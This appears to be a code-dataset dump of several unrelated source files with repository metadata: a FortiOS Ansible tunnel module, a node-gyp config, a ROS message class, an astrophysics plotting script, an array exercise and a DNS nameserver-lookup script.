"tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903891184648205, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}], "cursor": "eyJ2IjoiNzAwNzgwMzIxNDc1ODE1MDE3NSIsImkiOjIxODB9", "count": 4601, "has_more": true}
|
[
"[email protected]"
] | |
2af71e101ceac700047b14f879a4f1bfe9cdd8ee
|
42685099f1e25e5c1db51b98546e0be495d2789f
|
/v6.0.2/system/fortios_system_ipip_tunnel.py
|
31f4aa4a9c00a6e26f63b162ddc13d13344ebe69
|
[
"Apache-2.0"
] |
permissive
|
sxhdroid/ansible_fgt_modules
|
02aaf9af33063d8178e7e898666ac9cdef150a00
|
58d02d80a8d0ff145bee226b345ad9738af523f6
|
refs/heads/master
| 2020-04-18T01:34:45.990750 | 2019-01-22T10:47:36 | 2019-01-22T10:47:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,097 |
py
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
# Module metadata consumed by ansible-doc and the Ansible plugin loader.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_ipip_tunnel
short_description: Configure IP in IP Tunneling in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure system feature and ipip_tunnel category.
Examples includes all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip adress.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
system_ipip_tunnel:
description:
- Configure IP in IP Tunneling.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
interface:
description:
- Interface name that is associated with the incoming traffic from available options. Source system.interface.name.
local-gw:
description:
- IPv4 address for the local gateway.
name:
description:
- IPIP Tunnel name.
required: true
remote-gw:
description:
- IPv4 address for the remote gateway.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IP in IP Tunneling.
fortios_system_ipip_tunnel:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
system_ipip_tunnel:
state: "present"
interface: "<your_own_value> (source system.interface.name)"
local-gw: "<your_own_value>"
name: "default_name_5"
remote-gw: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: string
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: string
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: string
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: string
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: string
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: string
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: string
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: string
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: string
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: string
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: string
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
    """Authenticate the module-global FortiOSAPI handle ``fos``.

    :param data: module parameters dict; reads 'host', 'username',
        'password' and the optional 'https' flag.
    """
    host = data['host']
    username = data['username']
    password = data['password']
    fos.debug('on')
    # HTTPS is the default; it is disabled only when 'https' is present
    # and explicitly falsy.
    if 'https' in data and not data['https']:
        fos.https('off')
    else:
        fos.https('on')
    fos.login(host, username, password)
def filter_system_ipip_tunnel_data(json):
    """Return a copy of *json* restricted to the ipip-tunnel options
    the FortiGate API understands, dropping missing and None values.

    :param json: dict of user-supplied tunnel options
    :return: dict containing only the recognised, non-None options
    """
    allowed = ('interface', 'local-gw', 'name', 'remote-gw')
    return {key: json[key]
            for key in allowed
            if key in json and json[key] is not None}
def system_ipip_tunnel(data, fos):
    """Create or remove an ipip-tunnel entry on the FortiGate.

    :param data: full module parameter dict ('vdom' plus the
        'system_ipip_tunnel' sub-dict with its 'state' key)
    :param fos: logged-in FortiOSAPI connection
    :return: raw FortiOSAPI response dict (None if state is unknown)
    """
    vdom = data['vdom']
    tunnel_options = data['system_ipip_tunnel']
    payload = filter_system_ipip_tunnel_data(tunnel_options)
    state = tunnel_options['state']
    if state == "present":
        return fos.set('system', 'ipip-tunnel',
                       data=payload, vdom=vdom)
    if state == "absent":
        return fos.delete('system', 'ipip-tunnel',
                          mkey=payload['name'], vdom=vdom)
def fortios_system(data, fos):
    """Log in, apply the configured system method and log out.

    :param data: module parameters dict
    :param fos: FortiOSAPI connection (global, also passed explicitly)
    :return: (is_error, has_changed, response_dict)
    """
    login(data)
    # Explicit dispatch table instead of eval() on a method-name string:
    # eval is both a security smell and opaque to static analysis.
    dispatch = {'system_ipip_tunnel': system_ipip_tunnel}
    resp = None
    try:
        for method_name, method in dispatch.items():
            if data.get(method_name):
                resp = method(data, fos)
                break
    finally:
        # Always release the session, even if the method raised.
        fos.logout()
    if resp is None:
        # No applicable configuration section was supplied; the original
        # code crashed with an unbound 'resp' here.
        return True, False, {'status': 'error'}
    success = resp['status'] == "success"
    return not success, success, resp
def main():
    """Entry point: declare the Ansible argument spec, connect to the
    FortiGate via fortiosapi and report the result to Ansible."""
    # Argument spec mirrors the DOCUMENTATION block above.
    fields = {
        "host": {"required": True, "type": "str"},
        "username": {"required": True, "type": "str"},
        "password": {"required": False, "type": "str", "no_log": True},
        "vdom": {"required": False, "type": "str", "default": "root"},
        "https": {"required": False, "type": "bool", "default": "False"},
        "system_ipip_tunnel": {
            "required": False, "type": "dict",
            "options": {
                "state": {"required": True, "type": "str",
                          "choices": ["present", "absent"]},
                "interface": {"required": False, "type": "str"},
                "local-gw": {"required": False, "type": "str"},
                "name": {"required": True, "type": "str"},
                "remote-gw": {"required": False, "type": "str"}
            }
        }
    }
    module = AnsibleModule(argument_spec=fields,
                           supports_check_mode=False)
    # fortiosapi is imported lazily so a missing dependency is reported
    # through Ansible's normal failure channel instead of a traceback.
    try:
        from fortiosapi import FortiOSAPI
    except ImportError:
        module.fail_json(msg="fortiosapi module is required")
    global fos
    fos = FortiOSAPI()
    is_error, has_changed, result = fortios_system(module.params, fos)
    if not is_error:
        module.exit_json(changed=has_changed, meta=result)
    else:
        module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
3f3bf6e43eebbc4bc557d29096041bd38f644295
|
3922557a09e8573a10328513d25c551365916b36
|
/node_modules/socket.io/node_modules/socket.io-client/node_modules/ws/build/config.gypi
|
55677338992d2b1cea185bf970f72d860d53170d
|
[
"MIT"
] |
permissive
|
justintime170/nodeserv-test
|
f6b287f372f5859a78051a7f6e77ab441047bb7f
|
96e435fa9682303cc9cf07fbafdb55f37d68b08d
|
refs/heads/master
| 2016-09-05T23:46:03.891240 | 2014-08-21T07:30:13 | 2014-08-21T07:30:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,685 |
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/root/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"userignorefile": "/root/.npmignore",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"ignore": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"coverage": "",
"json": "",
"pre": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/root/.npm-init.js",
"userconfig": "/root/.npmrc",
"npaturl": "http://npat.npmjs.org/",
"node_version": "v0.8.20",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"yes": "",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/root/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.8.20 linux x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "0.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/root/tmp",
"unsafe_perm": "",
"link": "",
"prefix": "/usr"
}
}
|
[
"root@raspberrypi.(none)"
] |
root@raspberrypi.(none)
|
d0bf18c817e4f7f237487482234c057de31e6941
|
73189d4d0b39efe5864d25aff07d8338ab8f3110
|
/devel/lib/python2.7/dist-packages/tf2_msgs/msg/_LookupTransformFeedback.py
|
83b908a2db3ccc30e8952c4719a78f5af29e7c94
|
[] |
no_license
|
jungwoohan72/Multi_Robot_Search_And_Rescue
|
a64590a0f899682c2429400c5cb6d4d8a7d7fd99
|
3e70f9e9b895a96e045f19a05780b091c16f2e60
|
refs/heads/main
| 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,171 |
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from tf2_msgs/LookupTransformFeedback.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class LookupTransformFeedback(genpy.Message):
  """Autogenerated feedback message for the tf2 LookupTransform action.

  The message declares no fields (empty ``__slots__``), so every
  (de)serialization method below is effectively a no-op that only
  satisfies the genpy.Message API contract.
  """
  _md5sum = "d41d8cd98f00b204e9800998ecf8427e"
  _type = "tf2_msgs/LookupTransformFeedback"
  _has_header = False  # flag to mark the presence of a Header object
  _full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
"""
  __slots__ = []
  _slot_types = []

  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes.  You cannot mix in-order arguments and keyword arguments.

    The available fields are:
       

    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(LookupTransformFeedback, self).__init__(*args, **kwds)

  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types

  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      pass  # empty message: nothing to pack
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    if python3:
      codecs.lookup_error("rosmsg").msg_type = self._type
    try:
      end = 0  # empty message: nothing to unpack
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e)  # most likely buffer underfill

  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      pass  # empty message: nothing to pack
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    if python3:
      codecs.lookup_error("rosmsg").msg_type = self._type
    try:
      end = 0  # empty message: nothing to unpack
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e)  # most likely buffer underfill
# Cached Struct for a little-endian uint32, shared by all genpy messages.
_struct_I = genpy.struct_I
def _get_struct_I():
    """Return the module-level cached uint32 Struct instance."""
    global _struct_I
    return _struct_I
|
[
"[email protected]"
] | |
c33136cba8c462e8266f910e5907785846fdc01e
|
9c368c9fe78a2dd186daeed2d0714651c1c27d66
|
/absorption/ml_project/analyse_spectra/plot_Nweighted_deltaTZ_leg.py
|
05d0118c919d27b69595a6456dfdb4603b50129e
|
[] |
no_license
|
sarahappleby/cgm
|
5ff2121919e36b10069692f71fb1dc03f3678462
|
656bf308771dd3ff2f8c2e77107cdc14507c7ce7
|
refs/heads/master
| 2023-01-24T03:10:01.610418 | 2023-01-20T11:04:31 | 2023-01-20T11:04:31 | 160,820,718 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,422 |
py
|
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import AutoMinorLocator
import numpy as np
import h5py
import pygad as pg
import sys
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=15)
if __name__ == '__main__':
    # CLI arguments select the simulation run: model, wind model, snapshot.
    model = sys.argv[1]
    wind = sys.argv[2]
    snap = sys.argv[3]
    # Absorption lines analysed, their plot labels, and their ionisation
    # energies (log10 eV) used as the x axis.
    lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
    plot_lines = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
    line_ev = np.log10([13.6, 15.04, 24.38, 33.49, 64.49, 138.1]) # in eV
    # Horizontal offsets for the per-line annotations on the top panel.
    adjust_x = [0.015, 0.025, 0.02, 0.025, 0.02, 0.02]
    # Per-snapshot chi-squared acceptance limits, one value per line.
    chisq_lim_dict = {'snap_151': [4., 50., 15.8, 39.8, 8.9, 4.5],
                      'snap_137': [3.5, 28.2, 10., 35.5, 8.0, 4.5],
                      'snap_125': [3.5, 31.6, 15.8, 39.8, 10., 5.6],
                      'snap_105': [4.5, 25.1, 25.1, 34.5, 10., 7.1],}
    chisq_lim = chisq_lim_dict[f'snap_{snap}']
    snapfile = f'/disk04/sapple/data/samples/{model}_{wind}_{snap}.hdf5'
    s = pg.Snapshot(snapfile)
    redshift = s.redshift
    # Mean cosmic baryon density at this redshift; used to normalise rho
    # into an overdensity delta.
    rho_crit = float(s.cosmology.rho_crit(z=redshift).in_units_of('g/cm**3'))
    cosmic_rho = rho_crit * float(s.cosmology.Omega_b)
    # Minimum log column density per line and solar abundances used to
    # normalise metallicities.
    N_min = [12.7, 11.5, 12.8, 11.7, 12.8, 13.2]
    zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
    # Reference thresholds drawn as dotted lines (log overdensity, log T).
    deltath = 2.046913
    Tth = 5.
    # Impact-parameter bins in units of r200.
    delta_fr200 = 0.25
    min_fr200 = 0.25
    nbins_fr200 = 5
    fr200 = np.arange(min_fr200, (nbins_fr200+1)*delta_fr200, delta_fr200)
    # One viridis colour per radial bin.
    idelta = 0.8 / (len(fr200) -1)
    icolor = np.arange(0.1, 0.9+idelta, idelta)
    cmap = cm.get_cmap('viridis')
    colors = [cmap(i) for i in icolor]
    plot_dir = '/disk04/sapple/cgm/absorption/ml_project/analyse_spectra/plots/'
    sample_dir = f'/disk04/sapple/data/samples/'
    with h5py.File(f'{sample_dir}{model}_{wind}_{snap}_galaxy_sample.h5', 'r') as sf:
        gal_ids = sf['gal_ids'][:]
        mass = sf['mass'][:]
        ssfr = sf['ssfr'][:]
    fig, ax = plt.subplots(3, 1, figsize=(7, 6.5), sharey='row', sharex='col')
    ax = ax.flatten()
    for l, line in enumerate(lines):
        results_file = f'/disk04/sapple/data/normal/results/{model}_{wind}_{snap}_fit_lines_{line}.h5'
        # N-weighted median and interquartile values of overdensity (D),
        # temperature (T) and metallicity (Z), one entry per radial bin.
        weighted_D = np.zeros(len(fr200))
        weighted_D_25 = np.zeros(len(fr200))
        weighted_D_75 = np.zeros(len(fr200))
        weighted_T = np.zeros(len(fr200))
        weighted_T_25 = np.zeros(len(fr200))
        weighted_T_75 = np.zeros(len(fr200))
        weighted_Z = np.zeros(len(fr200))
        weighted_Z_25 = np.zeros(len(fr200))
        weighted_Z_75 = np.zeros(len(fr200))
        for i in range(len(fr200)):
            with h5py.File(results_file, 'r') as hf:
                all_Z = hf[f'log_Z_{fr200[i]}r200'][:] - np.log10(zsolar[l])
                all_T = hf[f'log_T_{fr200[i]}r200'][:]
                all_D = hf[f'log_rho_{fr200[i]}r200'][:] - np.log10(cosmic_rho)
                all_N = hf[f'log_N_{fr200[i]}r200'][:]
                all_chisq = hf[f'chisq_{fr200[i]}r200'][:]
                all_ids = hf[f'ids_{fr200[i]}r200'][:]
            # Keep only well-detected, well-fit absorbers.
            mask = (all_N > N_min[l]) * (all_chisq < chisq_lim[l])
            all_Z = all_Z[mask]
            all_T = all_T[mask]
            all_D = all_D[mask]
            all_ids = all_ids[mask]
            all_N = all_N[mask]
            # N-weighted percentiles: sort by the quantity, then find where
            # the cumulative column density crosses 25/50/75 per cent.
            order = np.argsort(all_D)
            weighted_D[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
            weighted_D_25[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
            weighted_D_75[i] = all_D[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
            order = np.argsort(all_T)
            weighted_T[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
            weighted_T_25[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
            weighted_T_75[i] = all_T[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
            order = np.argsort(all_Z)
            weighted_Z[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.5))]
            weighted_Z_25[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.25))]
            weighted_Z_75[i] = all_Z[order][np.argmin(np.abs(np.nancumsum(all_N[order]) / np.nansum(all_N) - 0.75))]
            # Error bars (25th-75th percentile range) only for the innermost bin.
            if i == 0:
                ax[0].errorbar(line_ev[l], weighted_D[i], color=colors[i], yerr=np.array([[weighted_D[i] - weighted_D_25[i], weighted_D_75[i] - weighted_D[i],]]).T,
                               lw=1, ls='None', marker='None', capsize=2)
                ax[1].errorbar(line_ev[l], weighted_T[i], color=colors[i], yerr=np.array([[weighted_T[i] - weighted_T_25[i], weighted_T_75[i] - weighted_T[i],]]).T,
                               lw=1, ls='None', marker='None', capsize=2)
                ax[2].errorbar(line_ev[l], weighted_Z[i], color=colors[i], yerr=np.array([[weighted_Z[i] - weighted_Z_25[i], weighted_Z_75[i] - weighted_Z[i],]]).T,
                               lw=1, ls='None', marker='None', capsize=2)
            ax[0].scatter(line_ev[l], weighted_D[i], color=colors[i])
            ax[1].scatter(line_ev[l], weighted_T[i], color=colors[i])
            # Label each radial bin once (on the first line) for the legend.
            if l == 0:
                ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i], label=r'$\rho / r_{{200}} = {{{}}}$'.format(fr200[i]))
            else:
                ax[2].scatter(line_ev[l], weighted_Z[i], color=colors[i])
        ax[0].annotate(plot_lines[l], xy=(line_ev[l] - adjust_x[l], np.min(weighted_D - 0.35)), fontsize=13)
    # Reference thresholds and cosmetics.
    ax[0].axhline(deltath, ls=':', c='k', lw=1)
    ax[1].axhline(Tth, ls=':', c='k', lw=1)
    ax[2].legend(loc=4, fontsize=12)
    ax[0].set_ylim(1, 4.)
    ax[1].set_ylim(4, 5.7)
    ax[2].set_ylim(-1.75, )
    ax[2].set_xlabel(r'${\rm log }(E / {\rm eV})$')
    ax[0].set_ylabel(r'${\rm log }\delta$')
    ax[1].set_ylabel(r'${\rm log } (T / {\rm K})$')
    ax[2].set_ylabel(r'${\rm log} (Z / Z_{\odot})$')
    ax[0].xaxis.set_minor_locator(AutoMinorLocator(4))
    ax[1].xaxis.set_minor_locator(AutoMinorLocator(4))
    plt.tight_layout()
    fig.subplots_adjust(wspace=0., hspace=0.)
    plt.savefig(f'{plot_dir}{model}_{wind}_{snap}_Nweighted_deltaTZ_chisqion.pdf', format='pdf')
    plt.clf()
|
[
"[email protected]"
] | |
80e40972cefad943c6a440d4cdb5f832a4e262f0
|
152fc8d9722e9811c0f15f26acf7cd1f82849b2a
|
/Facebook/move_zeros.py
|
163329db6cd3f9cbf7a56edfbae5b805e5f38c2e
|
[] |
no_license
|
uoojin1/algo_study
|
5942bc2ea9f2a752b36db296b42e1636a43c1553
|
c5078b377105f092668b594b0d7a297c4422b4a1
|
refs/heads/master
| 2020-04-13T17:38:05.429046 | 2019-02-07T02:32:24 | 2019-02-07T02:32:24 | 163,352,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 718 |
py
|
''' move zeros
input: [0,1,0,3,12]
output: [1,3,12,0,0]
1. do this in place, w/o making a copy of the array
2. minimize the number of operations
'''
'''
[0, 1, 0, 3, 12]
^
so basically have a pointer that points to where I should put the next non zero element to
after iterating through the entire array, I should have all the non zero numbers put to the
left side of the array. and the index should point at the start index of 0s to the right
'''
def moveZeros(nums):
    """Move all zeros in *nums* to the end, in place, keeping the
    relative order of the non-zero elements.

    Returns the same (mutated) list for convenience.
    """
    write = 0
    # First pass: compact the non-zero values to the front.
    for value in nums:
        if value != 0:
            nums[write] = value
            write += 1
    # Second pass: zero-fill everything after the last non-zero value.
    while write < len(nums):
        nums[write] = 0
        write += 1
    return nums
print moveZeros([0,1,0,3,12,0,5,2,1,70,0,0,3,0,2,1,5])
|
[
"[email protected]"
] | |
08c1931fd532b86ad3326a6391b1de86663e1372
|
64f81cfd4e588c1b6ead8481b2e35196c2149413
|
/obtaining3.58/obtaining_dns_client/resolving_domain_dns/resolving_domain_ns_by_tld2.py
|
fa5f9e6680c8e0d71df28c3f6b8e606ab86dbbb7
|
[] |
no_license
|
JX-Wang/Valid_DNS_verification
|
b1d7afb14fef78a30d1c21dffe6cf1ce4c5e2dbf
|
aecf68ca587022449c80b54ec53b43d9ec8dd8f0
|
refs/heads/master
| 2020-07-28T19:03:16.759597 | 2019-09-19T08:43:30 | 2019-09-19T08:43:30 | 209,502,842 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,858 |
py
|
#encoding:utf-8
"""
通过向各个层次的权威NS地址查询,获取域名的NS记录。
可以配置为在线和离线查询
目前只支持域名是主域名
"""
import dns
import random
import dns.name
import dns.query
import dns.resolver
def get_authoritative_nameserver(domain, offline=False, tld_server = None, default_dns = None, retry_times=1):
    """
    Obtain a domain's NS records by querying authoritative NS servers
    level by level (root-relative walk via the TLD).

    :param domain: domain to query; only registered (second-level) domains
        are supported
    :param offline: whether to query offline. Online means the TLD's
        authoritative server is resolved through the configured recursive
        resolvers; offline means it is supplied by the caller
    :param tld_server: when offline, the authoritative IP of the TLD
        nameserver (must be an IP address)
    :param default_dns: optional preferred recursive resolver IP
    :param retry_times: number of retries on query timeout
    :return: rrset with the domain's NS records, or an error string
        (Chinese/English messages are part of the public contract)
    """
    if offline and not tld_server: # offline mode requires a TLD authoritative IP; report the error
        return '顶级域名权威地址IP不能为空'
    n = dns.name.from_text(domain)
    if len(n) == 1:
        return "域名的顶级域名不存在"
    depth = 2
    rrset = None
    # Pool of public recursive resolvers, optionally led by default_dns.
    if default_dns:
        nameservers = [default_dns, '114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
    else:
        nameservers = ['114.114.114.114', '223.5.5.5','119.29.29.29','180.76.76.76']
    nameserver = default_dns # initial DNS server to query
    default = dns.resolver.Resolver(configure=False) # custom local recursive resolver
    default.timeout = 2
    random.shuffle(nameservers)
    default.nameservers = nameservers
    while True:
        s = n.split(depth)
        last = s[0].to_unicode() == u'@'
        sub = s[1]
        if len(sub) == 2: # at the TLD level: in offline mode, use the supplied TLD authoritative server
            if offline:
                nameserver = tld_server
                depth += 1
                continue
        # query = dns.message.make_query(sub, dns.rdatatype.NS, use_edns=True) # variant with EDNS enabled
        query = dns.message.make_query(sub, dns.rdatatype.NS)
        try:
            response = dns.query.udp(query, nameserver, timeout=2)
        except:
            if retry_times:
                retry_times = retry_times - 1
                if not rrset:
                    continue
                # pick another NS address from the last known rrset
                rrset_cnt = len(rrset) # size of the rrset
                random_serial = random.randint(0, rrset_cnt - 1)
                rr = rrset[random_serial] # pick one record at random
                try:
                    authority = rr.target
                except Exception,e:
                    return str(e)
                try:
                    nameserver = default.query(authority).rrset[0].to_text()
                except:
                    try:
                        nameserver = default.query(authority).rrset[0].to_text()
                    except:
                        return "resovling nameserver failed"
                continue
            else:
                return 'TIMEOUT'
        retry_times = 1 # on success, reset the timeout retry budget
        rcode = response.rcode()
        if rcode != dns.rcode.NOERROR:
            if rcode == dns.rcode.NXDOMAIN:
                # print '%s does not exist.' % sub
                return 'NOEXSIT'
            else:
                return 'Error %s' % dns.rcode.to_text(rcode)
        try: # added exception guard around authority/answer extraction
            if len(response.authority) > 0:
                rrset = response.authority[0]
            else:
                rrset = response.answer[0]
        except Exception, e:
            return str(e)
        if last:
            return rrset
        rrset_cnt = len(rrset) # size of the rrset
        random_serial = random.randint(0, rrset_cnt-1) # pick a random index based on the size
        rr = rrset[random_serial] # pick one record at random
        if rr.rdtype == dns.rdatatype.SOA:
            # print 'Same server is authoritative for %s' % sub
            pass
        else:
            try:
                authority = rr.target
            except:
                return 'authority soa target error'
            # print '%s is authoritative for %s' % (authority, sub)
            try:
                nameserver = default.query(authority).rrset[0].to_text()
            except:
                try:
                    nameserver = default.query(authority).rrset[0].to_text()
                except:
                    return "resovling nameserver failed"
        depth += 1
def parse_rc_ns(rrset):
    """Extract the NS targets from an rrset's text representation.

    :param rrset: object whose ``to_text()`` yields lines of the form
        ``owner. ttl IN NS target.``
    :return: (owner_domain, ns_list) where owner_domain has its trailing
        dot stripped and ns_list holds the lower-cased NS targets,
        sorted and without trailing dots
    """
    servers = []
    owner = ""
    for record_line in str(rrset.to_text()).split('\n'):
        fields = record_line.split(' ')
        if fields[3] == 'NS':
            servers.append(fields[4][:-1].lower())
            owner = fields[0][:-1]
    return owner, sorted(servers)
def get_domain_ns_hierarchical_dns(main_domain, offline=False, tld_server=None, default_dns=None):
    """Resolve the NS records of *main_domain* by walking the DNS hierarchy.

    Returns ([domain, nameservers], status): status is 'TRUE' when the
    answer's owner name matches the queried domain, 'FALSE' when it does not,
    and otherwise the error string produced by the resolver walk.
    """
    result = get_authoritative_nameserver(main_domain, offline, tld_server, default_dns)
    if not isinstance(result, dns.rrset.RRset):
        # Resolution failed; propagate the resolver's error string as status.
        return [main_domain, []], result
    answered_domain, nameservers = parse_rc_ns(result)
    if answered_domain == main_domain:
        return [main_domain, nameservers], 'TRUE'
    return [main_domain, []], 'FALSE'
# Demo entry point (Python 2 print syntax): exercise both resolution modes.
if __name__ == '__main__':
    domain = 'badoo.com'
    print get_domain_ns_hierarchical_dns(domain, offline=True, tld_server='192.26.92.30')  # offline mode: query the given TLD server directly
    domain = 'baidu.com'
